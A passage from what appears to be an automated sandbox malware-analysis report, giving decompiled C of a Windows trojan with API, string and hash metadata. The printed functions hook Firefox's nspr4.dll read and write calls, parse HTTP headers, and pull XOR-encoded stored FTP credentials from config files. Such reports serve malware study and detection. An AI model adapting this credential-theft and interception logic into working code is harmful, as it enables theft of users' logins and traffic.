    							if(_t72 !=  *0x42dd08) {
    								 *0x42dd08 = _t72;
    								E00412320(_t72);
    							}
    							if((E00412360() & 0x00000100) == 0) {
    								 *(_t113 + 0x14) = "aeiouy";
    								 *(_t113 + 0x18) = _t97;
    							} else {
    								 *(_t113 + 0x14) = _t97;
    								 *(_t113 + 0x18) = "aeiouy";
    							}
    							_t80 = 0;
    						}
    						_t99 =  *((intOrPtr*)(_t113 + 0x14 + _t80 * 4));
    						asm("sbb esi, esi");
    						_t107 = ( ~(_t99 - "bcdfghklmnpqrstvwxz") & 0xfffffff3) + 0x13;
    						if( *(_t113 + 0x10) == 0 || _t111 -  *(_t113 + 0x28) <= 1) {
    							L26:
    							_t108 = _t107 - 1;
    							if(_t108 != 0) {
    								_t64 = GetTickCount();
    								if(_t64 !=  *0x42dd08) {
    									 *0x42dd08 = _t64;
    									E00412320(_t64);
    								}
    								_t87 = E00412360() - _t65 / (_t108 + 1) * (_t108 + 1);
    							} else {
    								_t87 = 0;
    							}
    							_t59 =  *((char*)(_t99 + _t87));
    							 *( *(_t113 + 0x24) + _t111 * 2) = _t59;
    						} else {
    							_t70 = GetTickCount();
    							if(_t70 !=  *0x42dd08) {
    								 *0x42dd08 = _t70;
    								E00412320(_t70);
    							}
    							_t59 = E00412360() & 0x00000101;
    							if(_t59 != 0x101) {
    								goto L26;
    							} else {
    								 *( *(_t113 + 0x24) + _t111 * 2) = 0x20;
    								 *(_t113 + 0x28) = _t111;
    							}
    						}
    						_t111 = _t111 + 1;
    						_t80 = _t80 + 1;
    						if(_t111 <  *(_t113 + 0x2c)) {
    							_t97 = "bcdfghklmnpqrstvwxz";
    							continue;
    						}
    						_t100 =  *(_t113 + 0x2c);
    						goto L34;
    					}
    				}
    				L34:
    				_t85 =  *(_t113 + 0x20);
    				if((_t85 & 0x00000004) == 0 || _t100 == 0) {
    					_t98 =  *(_t113 + 0x1c);
    				} else {
    					_t98 =  *(_t113 + 0x1c);
    					_t59 = _t98 + _t100 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t100 = _t100 - 1;
    						if(_t100 != 0) {
    							continue;
    						} else {
    						}
    						goto L41;
    					}
    				}
    				L41:
    				_t98[_t100] = 0;
    				if((_t85 & 0x00000002) != 0) {
    					_t61 = CharUpperW( *_t98 & 0x0000ffff);
    					 *_t98 = _t61;
    					return _t61;
    				}
    				return _t59;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CountTick$CharUpper
    • String ID: aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 466868486-1727281576
    • Opcode ID: f5fecc61265fe6ef4f3ae1547ff2a2be4697bdf38866b1aef2714e1f46d19fe7
    • Instruction ID: 7190d3ddee896ede0d60032a6b0db2b17c6f5fb73911955b0f1966371fdee0a8
    • Opcode Fuzzy Hash: f5fecc61265fe6ef4f3ae1547ff2a2be4697bdf38866b1aef2714e1f46d19fe7
    • Instruction Fuzzy Hash: 6C510171D143109BC320AF2495491AABBE5BFC4314F56492FE895E72A0C37CDAC5CB8E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C9D0() {
    				void _v524;
    				long _v528;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				unsigned int _t19;
    				struct HINSTANCE__* _t26;
    				void* _t41;
    				void* _t44;
    
    				InitializeCriticalSection(0x42ede8);
    				_t38 = 0;
    				 *0x42eddc = 0;
    				 *0x42ede4 = 0;
    				 *0x42ede0 = 0;
    				 *0x42e8f4 = 0;
    				 *0x42ee14 = 0;
    				 *0x42ee94 = 0;
    				 *0x42ee98 = 0;
    				InitializeCriticalSection(0x42ee7c);
    				E0041D210(0,  &_v524);
    				_v528 = 0x1fe;
    				_t34 = 0xffffffff;
    				_t41 = CreateFileW( &_v524, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t41 != 0xffffffff) {
    					_t38 = _v528;
    					ReadFile(_t41,  &_v524, _v528,  &_v528, 0);
    					_t34 =  !=  ? _v528 : 0xffffffff;
    					CloseHandle(_t41);
    				}
    				_t19 = _t34;
    				if(_t34 == 0xffffffff || (_t34 & 0x00000001) != 0) {
    					_t19 = 0;
    				}
    				 *((short*)(_t44 + 0x18 + (_t19 >> 1) * 2)) = 0;
    				E0040AC10( &_v524);
    				E00407870( &_v524, 0, _t38, 0);
    				 *0x42e71c = 0;
    				 *0x42e7ec = 0;
    				InitializeCriticalSection(0x42edc4);
    				E004266C0();
    				_t26 = GetModuleHandleW(L"nspr4.dll");
    				_t51 = _t26;
    				if(_t26 != 0 && E0041E890(_t38, _t26, _t51) != 0) {
    					 *0x42e700 =  *0x42e700 | 0x00000001;
    				}
    				E0041E610();
    				return 1;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(0042EDE8,?,00000000,?,00000000), ref: 0041C9E5
    • InitializeCriticalSection.KERNEL32(0042EE7C,?,00000000,?,00000000), ref: 0041CA19
    • CreateFileW.KERNEL32 ref: 0041CA44
    • ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 0041CA62
    • CloseHandle.KERNEL32(00000000), ref: 0041CA70
    • InitializeCriticalSection.KERNEL32(0042EDC4), ref: 0041CAB0
    • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041CABC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateModuleRead
    • String ID: nspr4.dll
    • API String ID: 1419303690-741017701
    • Opcode ID: 0ebb81f68cbf51a1810601070def739ad2cf0e360a7adde858448913c0ea90d8
    • Instruction ID: f9700dfaeb0cb33f06f31449c982fe5d827adb82d1ea0dd809343f677e90017f
    • Opcode Fuzzy Hash: 0ebb81f68cbf51a1810601070def739ad2cf0e360a7adde858448913c0ea90d8
    • Instruction Fuzzy Hash: 1021BF312403005BD310EF76AD89A9B7BE8EF84750F840A3EB515D31B0E7789886CB6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041E890(void* __edx, struct HINSTANCE__* __esi, void* __eflags) {
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t7;
    				intOrPtr _t8;
    				void* _t12;
    				intOrPtr _t13;
    				intOrPtr _t15;
    
    				 *0x42d348 = GetProcAddress(__esi, "PR_OpenTCPSocket");
    				 *0x42d358 = GetProcAddress(__esi, "PR_Close");
    				 *0x42d368 = GetProcAddress(__esi, "PR_Read");
    				 *0x42d378 = GetProcAddress(__esi, "PR_Write");
    				_t12 = E0041E560(4, GetProcAddress, 0x42d348);
    				if(_t12 != 0) {
    					_t7 =  *0x42d380; // 0x0
    					_t13 =  *0x42d370; // 0x0
    					_t15 =  *0x42d360; // 0x0
    					_t8 =  *0x42d350; // 0x0
    					E00407930(__esi, _t8, _t15, _t13, _t7);
    				}
    				return _t12;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0041E89E
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0041E8AB
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0041E8B8
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0041E8C5
      • Part of subcall function 0041E560: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,77E49EB0,00000000,7743A6D0,0041E88B,0042D008,00000000,0041CADD), ref: 0041E595
      • Part of subcall function 00407930: InitializeCriticalSection.KERNEL32(0042D3C4,00000000,0041E902,00000000,00000000,00000000,00000000,0042D348), ref: 00407944
      • Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407982
      • Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00407995
      • Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 004079A8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: 75ed6ea55011da22a0b47e04b1b042b6d47336d752c5ca886dd4aa18bc8817ef
    • Instruction ID: 9cbb10fc318e0978e96923f2ede07792dfff2833d56e48d464e900323557f706
    • Opcode Fuzzy Hash: 75ed6ea55011da22a0b47e04b1b042b6d47336d752c5ca886dd4aa18bc8817ef
    • Instruction Fuzzy Hash: 93F0FFF5B51354AAD320EBB9EC85E573BACAB89B00764403BF800A72A1D6789442CB5D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00408050(void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12) {
    				intOrPtr _v4;
    				intOrPtr _v8;
    				int _v20;
    				char _v24;
    				signed int* _v28;
    				intOrPtr _v40;
    				char _v44;
    				char _v60;
    				char _v76;
    				intOrPtr _v84;
    				intOrPtr _v92;
    				void* __esi;
    				int _t39;
    				void* _t46;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    				signed int _t51;
    				void* _t62;
    				char _t66;
    				int _t67;
    				intOrPtr _t68;
    				char* _t69;
    				int _t72;
    				signed int _t73;
    				void* _t78;
    				void* _t85;
    				void* _t86;
    				signed int* _t87;
    				void* _t88;
    				intOrPtr _t90;
    				char* _t91;
    				signed int* _t93;
    				void* _t97;
    				intOrPtr _t98;
    				void* _t99;
    
    				_t67 = _a8;
    				_t90 = _a12;
    				_t39 = E00410890(_t67, _t90, "\r\n\r\n", 4);
    				_v20 = _t39;
    				if(_t39 != 0) {
    					if(_t39 == _t67) {
    						L21:
    						return _t39 | 0xffffffff;
    					} else {
    						E00410870(_a4, _a4, 0, 0x10);
    						_push( &_v24);
    						_push(0);
    						_push(_t90);
    						_push(_t67);
    						_t39 = E00417950();
    						_t71 = _t39;
    						if(_t39 != 0 && _v28 == 8) {
    							_t39 = E00411B20(7, _t71, 7, "HTTP/1.");
    							if(_t39 == 0) {
    								_t97 = _t67 + _t90;
    								while(_t67 < _t97) {
    									_t91 = _t67;
    									_t39 = _t67;
    									if(_t67 < _t97) {
    										while(1) {
    											_t78 =  *_t39;
    											if(_t78 == 0xa || _t78 == 0xd) {
    												goto L11;
    											}
    											_t39 =  &(1[_t39]);
    											if(_t39 < _t97) {
    												continue;
    											}
    											goto L11;
    										}
    									}
    									L11:
    									_t72 =  &(1[_t39]);
    									_t85 = _t39 - _t67;
    									if(_t72 < _t97 &&  *_t39 == 0xd &&  *_t72 == 0xa) {
    										_t39 = _t72;
    									}
    									_t67 =  &(1[_t39]);
    									if(_t85 == 0) {
    										goto L21;
    									} else {
    										if(_t91 == _v8) {
    											_t86 = _t85 + _t91;
    											_t73 = 0;
    											if(_t91 >= _t86) {
    												goto L21;
    											} else {
    												do {
    													_t39 =  *_t91;
    													if(_t39 == 0x20 || _t39 >= 9 && _t39 <= 0xd) {
    														if(_t73 < 2) {
    															 *(_t99 + 0x14 + _t73 * 4) = _t91;
    														}
    														_t73 =  &(1[_t73]);
    													}
    													_t91 =  &(_t91[1]);
    												} while (_t91 < _t86);
    												if(_t73 != 2) {
    													goto L21;
    												} else {
    													_t93 =  &(_v28[0]);
    													_t39 = _v24 - _t93;
    													goto L38;
    												}
    											}
    										} else {
    											if(_t85 == 0) {
    												goto L20;
    											} else {
    												_t39 = StrCmpNIA(1, _t91, 0);
    												if(_t39 != 0 ||  *_t91 != 0x3a) {
    													goto L20;
    												} else {
    													_t88 = _t85 + _t91;
    													do {
    														_t66 = _t91[1];
    														_t91 =  &(_t91[1]);
    													} while (_t66 == 0x20 || _t66 >= 9 && _t66 <= 0xd);
    													_t39 = _t88 - _t91;
    													L38:
    													_v28 = _t39;
    													if(_t93 == 0 || _t39 != 3 ||  *_t93 != 0x32) {
    														goto L21;
    													} else {
    														_t39 = 0x30;
    														if(_t93[0] != 0x30 || _t93[0] != 0x30) {
    															goto L21;
    														} else {
    															_t98 = _v4;
    															_t80 =  &_v28;
    															_push( &_v28);
    															_push("Transfer-Encoding");
    															_push(_t98);
    															_push(_v8);
    															_t46 = E00417950();
    															_t74 = _t46;
    															if(_t46 == 0) {
    																_t87 = _v28;
    																goto L47;
    															} else {
    																_t80 = _v44;
    																_t39 = E00411B20(7, _t74, _v44, "chunked");
    																if(0x30 != 0) {
    																	goto L21;
    																} else {
    																	_t87 = _v28;
    																	 *_t87 =  *_t87 | 0x00000002;
    																	L47:
    																	_t68 = _v24;
    																	_push( &_v44);
    																	_push("Content-Length");
    																	_push(_t98);
    																	_push(_t68);
    																	_t47 = E00417950();
    																	_t94 = _t47;
    																	if(_t47 == 0) {
    																		L53:
    																		_push( &_v60);
    																		_push("Connection");
    																		_push(_t98);
    																		_push(_t68);
    																		_t48 = E00417950();
    																		_t76 = _t48;
    																		if(_t48 == 0 || _v76 != 5 || E00411B20(5, _t76, 5, "close") != 0) {
    																			_push( &_v76);
    																			_push("Proxy-Connection");
    																			_push(_t98);
    																			_push(_t68);
    																			_t50 = E00417950();
    																			_t77 = _t50;
    																			if(_t50 != 0 && _v92 == 5 && E00411B20(5, _t77, 5, "close") == 0) {
    																				goto L59;
    																			}
    																		} else {
    																			L59:
    																			 *_t87 =  *_t87 | 0x00000001;
    																		}
    																		_t51 =  *_t87;
    																		if((_t51 & 0x00000007) == 0) {
    																			 *_t87 = _t51 | 0x00000001;
    																		}
    																		_t87[2] = _v84 - _t68 + 4;
    																		return 1;
    																	} else {
    																		_t62 = E00410E10(_v60, _t94);
    																		_t96 = _t62;
    																		if(_t62 == 0) {
    																			_t69 = 1;
    																		} else {
    																			_t87[1] = E00410FE0(_t62, _t80);
    																			_t69 = 0;
    																		}
    																		_t39 = E004107C0(_t96);
    																		 *_t87 =  *_t87 | 0x00000004;
    																		if(_t69 != 0) {
    																			goto L21;
    																		} else {
    																			_t68 = _v40;
    																			goto L53;
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									goto L63;
    									L20:
    								}
    							}
    						}
    						goto L21;
    					}
    				} else {
    					return _t39;
    				}
    				L63:
    			}

    APIs
    • StrCmpNIA.SHLWAPI(00000001,00000000,00000000,HTTP/1.,?,?,00000000,00000004,?,00000000,00000010,?,?,), ref: 00408116
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
    • API String ID: 0-1412996494
    • Opcode ID: 7661bec7ae00a195cf369e40d1c2679e28a3d2868bf0d541fab37001a736806b
    • Instruction ID: 4f0a6b4814501ece17e4ab50f1d8175e81376bd5909d69b821a5b5c76d1d8581
    • Opcode Fuzzy Hash: 7661bec7ae00a195cf369e40d1c2679e28a3d2868bf0d541fab37001a736806b
    • Instruction Fuzzy Hash: 5E7101316043125BDB209A299E41BABBB959F51714F14083FF8C1BB2D1DE78DC8A879E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00422370(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
    				short _v524;
    				char _v532;
    				char _v584;
    				char _v588;
    				char _v596;
    				char _v604;
    				char _v612;
    				char _v616;
    				void* _v628;
    				intOrPtr _v632;
    				void* _v636;
    				signed int _v640;
    				char _v644;
    				char* _v652;
    				void* _v656;
    				char _v660;
    				char* _v664;
    				char* _v668;
    				intOrPtr _v672;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t69;
    				void* _t78;
    				intOrPtr _t94;
    				intOrPtr _t103;
    				intOrPtr _t110;
    				void* _t111;
    				void* _t114;
    				void* _t125;
    				signed int _t126;
    				char* _t127;
    				intOrPtr* _t128;
    				WCHAR* _t131;
    				intOrPtr _t149;
    				signed int _t157;
    				void* _t166;
    				signed char* _t170;
    				intOrPtr _t173;
    				char* _t174;
    				intOrPtr _t177;
    				void** _t178;
    				signed int _t180;
    				void* _t182;
    
    				_t131 = __ecx;
    				_t182 = (_t180 & 0xfffffff8) - 0x28c;
    				_t170 = __edx;
    				_t69 = __edx + 0x2c;
    				if(_t69 != 0) {
    					L1:
    					_t157 =  *_t69 & 0x0000ffff;
    					if(_t157 == 0x5c || _t157 == 0x2f) {
    						_t69 =  &(_t69[1]);
    						goto L1;
    					}
    				}
    				if(PathCombineW( &_v524, _t131, _t69) == 0) {
    					L39:
    					return 1;
    				} else {
    					if(( *_t170 & 0x00000010) == 0) {
    						if(E00418040(2,  &_v532,  &_v636) != 0) {
    							_t125 = _v636;
    							_t173 = E00411430(_v632, _t125,  &_v660, 1, 0);
    							_v660 = _t173;
    							if(_t173 != 0xffffffff) {
    								_v656 = HeapAlloc( *0x42e6d4, 8, 0x626);
    								E004240C0(0x91,  &_v596);
    								E004240C0(0x92,  &_v612);
    								E004240C0(0x93,  &_v604);
    								E004240C0(0x94,  &_v584);
    								if(_v656 != 0) {
    									_t126 = 0;
    									_v640 = 0;
    									if(_t173 != 0) {
    										do {
    											_t94 = _v660;
    											if( *(_t94 + _t126 * 4) != 0) {
    												_v652 = StrStrIA( *(_t94 + _t126 * 4),  &_v596);
    												_t174 = StrStrIA( *(_v664 + _t126 * 4),  &_v616);
    												_v664 = StrStrIA( *(_v668 + _t126 * 4),  &_v612);
    												_t127 = StrStrIA( *(_v672 + _t126 * 4),  &_v596);
    												_t103 = _v664;
    												if(_t103 != 0) {
    													_t149 = _v668;
    													if(_t149 != 0 && _t127 != 0) {
    														_v664 = _t103 + 8;
    														_v668 = _t149 + 6;
    														_t128 = _t127 + 0xa;
    														E00422340(_t103 + 8);
    														E00422340(_t149 + 6);
    														E00422340(_t128);
    														if(_t174 == 0) {
    															L18:
    															_t166 = 0x15;
    														} else {
    															_t47 = _t174 + 6; // 0x6
    															E00422340(_t47);
    															_t48 = _t174 + 6; // 0x6
    															_t166 = E004110A0(_t48, 0);
    															if(_t166 < 1 || _t166 > 0xffff) {
    																goto L18;
    															}
    														}
    														if( *_v664 != 0 &&  *_v668 != 0) {
    															_t110 =  *_t128;
    															if(_t110 != 0) {
    																if(_t110 == 0x30 || _t110 == 0x31) {
    																	if( *((char*)(_t128 + 1)) != 0) {
    																		goto L25;
    																	}
    																} else {
    																	L25:
    																	_t111 = 0;
    																	if( *_t128 != 0) {
    																		do {
    																			 *(_t111 + _t128) =  *(_t111 + _t128) ^ 0x00000019;
    																			_t111 = _t111 + 1;
    																		} while ( *(_t111 + _t128) != 0);
    																		if(_t111 > 0) {
    																			E00424100(0x57,  &_v588);
    																			_push(_t166);
    																			_push(_v664);
    																			_push(_t128);
    																			_t176 = _v672;
    																			_push(_v668);
    																			_t114 = E00411D10(_v664, 0x311, _v672,  &_v588);
    																			_t182 = _t182 + 0x14;
    																			if(_t114 > 0) {
    																				_t177 = _a4;
    																				if(E00410D70(_t177, _t176, _t114) != 0) {
    																					 *((intOrPtr*)(_t177 + 4)) =  *((intOrPtr*)(_t177 + 4)) + 1;
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    												_t126 = _v656;
    												_t173 = _v660;
    											}
    											_t126 = _t126 + 1;
    											_v640 = _t126;
    										} while (_t126 < _t173);
    									}
    									HeapFree( *0x42e6d4, 0, _v656);
    									_t125 = _v636;
    								}
    								E004107E0(_t173, _v660);
    							}
    							if(_t125 != 0) {
    								VirtualFree(_t125, 0, 0x8000);
    							}
    							_t78 = _v628;
    							if(_t78 != 0) {
    								CloseHandle(_t78);
    							}
    						}
    						goto L39;
    					} else {
    						_t178 =  &_v636;
    						E00424100(0x90, _t178);
    						_v644 = _t178;
    						E00418700( &_v532,  &_v644, 1, 5, E00422370, _a4, 0, 0, 0);
    						return 1;
    					}
    				}
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 004223A4
    • HeapAlloc.KERNEL32(?,00000008,00000626,?,00000000,00000001,00000000,?,?), ref: 0042244A
    • StrStrIA.SHLWAPI(?,?), ref: 004224C2
    • StrStrIA.SHLWAPI(00000000,?), ref: 004224D5
    • StrStrIA.SHLWAPI(00000000,?), ref: 004224E6
    • StrStrIA.SHLWAPI(00000000,?), ref: 004224F9
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0042260F
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000001,00000000,?,?), ref: 00422630
    • CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,?,?), ref: 0042263F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$AllocCloseCombineHandlePathVirtual
    • String ID:
    • API String ID: 1843439433-0
    • Opcode ID: 88398a899154538563f16734129c64393c34f8590b06b6725c7003e37382648a
    • Instruction ID: ca25dc349efcee8b941a250c8365372b468a1df006bb39ab1b6f66022b87276a
    • Opcode Fuzzy Hash: 88398a899154538563f16734129c64393c34f8590b06b6725c7003e37382648a
    • Instruction Fuzzy Hash: 9881F2717043216FD720DF68E980B5BB7E8AB88304F44491EF98097391D7B8ED85CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E00419B40(intOrPtr __esi) {
    				signed int _v64;
    				short* _v68;
    				intOrPtr* _v100;
    				intOrPtr _v264;
    				void* _v268;
    				long _v280;
    				char _v284;
    				char _v288;
    				intOrPtr _v300;
    				void* _v304;
    				long _v308;
    				char _v312;
    				void* _v320;
    				signed short _v322;
    				signed int _v324;
    				intOrPtr _v336;
    				void* _v340;
    				long _v344;
    				char _v348;
    				void* _v356;
    				signed short _v358;
    				intOrPtr _v376;
    				intOrPtr _v392;
    				void* __ebx;
    				void* __edi;
    				signed int _t50;
    				signed int _t53;
    				void* _t57;
    				signed int _t58;
    				short* _t63;
    				signed short _t65;
    				signed int _t66;
    				signed char _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t79;
    				signed short _t85;
    				void* _t99;
    				signed int _t102;
    				void* _t103;
    				signed int _t105;
    				intOrPtr _t106;
    				char* _t107;
    				void* _t108;
    				signed int _t109;
    				signed int _t110;
    				void* _t114;
    
    				_t106 = __esi;
    				_t99 = 4;
    				_t107 =  &_v288;
    				while(1) {
    					_t50 =  &_v284;
    					_v284 = 0x1e;
    					_v280 = 0;
    					_v268 = 1;
    					_v264 = _t106;
    					__imp__#18(0,  &_v268, 0, 0, _t50);
    					if(_t50 != 1) {
    						break;
    					}
    					__imp__#16(_t106, _t107, _t99, 0);
    					if(_t50 <= 0) {
    						break;
    					} else {
    						_t99 = _t99 - _t50;
    						_t107 = _t107 + _t50;
    						_t114 = _t99;
    						if(_t114 > 0) {
    							continue;
    						} else {
    							if((_t50 & 0xffffff00 | _t114 == 0x00000000) == 0) {
    								break;
    							} else {
    								_t85 = _v324;
    								if(_t85 <= 4) {
    									break;
    								} else {
    									_t53 = _t85 & 0x0000ffff;
    									if(_t53 == 0) {
    										L9:
    										E00414C40(_t106, 0x7530, (_v322 & 0x0000ffff) + (_t85 & 0x0000ffff) - 4);
    										break;
    									} else {
    										_t57 = HeapAlloc( *0x42e6d4, 8, _t53 + 4);
    										_v320 = _t57;
    										if(_t57 != 0) {
    											_t102 = (_v324 & 0x0000ffff) - 4;
    											__eflags = _t102;
    											_t108 = _t57;
    											while(1) {
    												_t58 =  &_v312;
    												_v312 = 0x1e;
    												_v308 = 0;
    												_v304 = 1;
    												_v300 = _t106;
    												__imp__#18(0,  &_v304, 0, 0, _t58);
    												__eflags = _t58 - 1;
    												if(_t58 != 1) {
    													break;
    												}
    												__imp__#16(_t106, _t108, _t102, 0);
    												__eflags = _t58;
    												if(_t58 <= 0) {
    													break;
    												} else {
    													_t102 = _t102 - _t58;
    													_t108 = _t108 + _t58;
    													__eflags = _t102;
    													if(__eflags > 0) {
    														continue;
    													} else {
    														if(__eflags != 0) {
    															_t63 = _v68;
    															_t103 = _v356;
    															 *((short*)(_t63 + 2)) = _v358;
    															 *_t63 = 5;
    															 *((char*)(_t63 + 4)) =  *_t103;
    															HeapFree( *0x42e6d4, 0, _t103);
    															_t65 = _v358;
    															__eflags = _t65;
    															if(_t65 != 0) {
    																_t109 = _v64;
    																__eflags = _t109;
    																if(_t109 == 0) {
    																	L31:
    																	_t66 = E00414C40(_t106, 0x7530, _t65 & 0x0000ffff);
    																	__eflags = _t109;
    																	_t69 = (_t66 & 0xffffff00 | _t109 != 0x00000000) - 0x00000001 & _t66;
    																	__eflags = _t69;
    																	return _t69;
    																} else {
    																	_t71 = E004107A0(_t65 & 0x0000ffff);
    																	_v356 = _t71;
    																	__eflags = _t71;
    																	if(_t71 == 0) {
    																		_t65 = _v358;
    																		goto L31;
    																	} else {
    																		_t105 = _v358 & 0x0000ffff;
    																		_t110 = _t71;
    																		while(1) {
    																			_t72 =  &_v348;
    																			_v348 = 0x1e;
    																			_v344 = 0;
    																			_v340 = 1;
    																			_v336 = _t106;
    																			__imp__#18(0,  &_v340, 0, 0, _t72);
    																			__eflags = _t72 - 1;
    																			if(_t72 != 1) {
    																				break;
    																			}
    																			__imp__#16(_t106, _t110, _t105, 0);
    																			__eflags = _t72;
    																			if(_t72 <= 0) {
    																				break;
    																			} else {
    																				_t105 = _t105 - _t72;
    																				_t110 = _t110 + _t72;
    																				__eflags = _t105;
    																				if(__eflags > 0) {
    																					continue;
    																				} else {
    																					if(__eflags != 0) {
    																						 *_v100 = _v392;
    																						goto L29;
    																					} else {
    																						break;
    																					}
    																				}
    																			}
    																			goto L32;
    																		}
    																		E004107C0(_v376);
    																		__eflags = 0;
    																		return 0;
    																	}
    																}
    															} else {
    																_t79 = _v64;
    																__eflags = _t79;
    																if(_t79 == 0) {
    																	L29:
    																	return 1;
    																} else {
    																	 *_t79 = 0;
    																	return 1;
    																}
    															}
    														} else {
    															break;
    														}
    													}
    												}
    												goto L32;
    											}
    											HeapFree( *0x42e6d4, 0, _v340);
    											__eflags = 0;
    											return 0;
    										} else {
    											_t85 = _v324;
    											goto L9;
    										}
    									}
    								}
    							}
    						}
    					}
    					L32:
    				}
    				return 0;
    				goto L32;
    			}

    APIs
    • select.WS2_32 ref: 00419B79
    • recv.WS2_32(00000104,00000104,00000004,00000000), ref: 00419B88
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 00419BBF
    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00419C27
    • recv.WS2_32(00000104,00000000,00000100,00000000), ref: 00419C36
    • HeapFree.KERNEL32(?,00000000,?), ref: 00419C5B
    • HeapFree.KERNEL32(?,00000000,?), ref: 00419C99
    • select.WS2_32(00000000,0000001E,00000000,00000000,00000000), ref: 00419D17
    • recv.WS2_32(00000104,00000000,?,00000000), ref: 00419D26
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heaprecvselect$Free$Alloc
    • String ID:
    • API String ID: 3564761155-0
    • Opcode ID: 6d2e3bcd1284506f033aea8dd3e93245c1328f7143cc7dec781800125d4763d8
    • Instruction ID: b639df19a86d6785f5c6c8c3fa4ee62ddfa50ad74cf38afee805f889fafc6719
    • Opcode Fuzzy Hash: 6d2e3bcd1284506f033aea8dd3e93245c1328f7143cc7dec781800125d4763d8
    • Instruction Fuzzy Hash: D551C3761083406FD3109F15D9849EFB7E9FBD9310F84482EF48587250E379DD8A876A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00420820(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
    				short _v524;
    				short _v532;
    				char _v572;
    				short _v584;
    				short _v596;
    				short _v608;
    				short _v616;
    				void* _v620;
    				int _v624;
    				intOrPtr _v628;
    				WCHAR* _v632;
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t37;
    				long _t43;
    				void* _t47;
    				void* _t55;
    				int _t59;
    				WCHAR* _t66;
    				void* _t69;
    				WCHAR* _t81;
    				signed int _t103;
    				void* _t106;
    				signed char* _t109;
    				WCHAR* _t116;
    				WCHAR* _t117;
    				intOrPtr _t121;
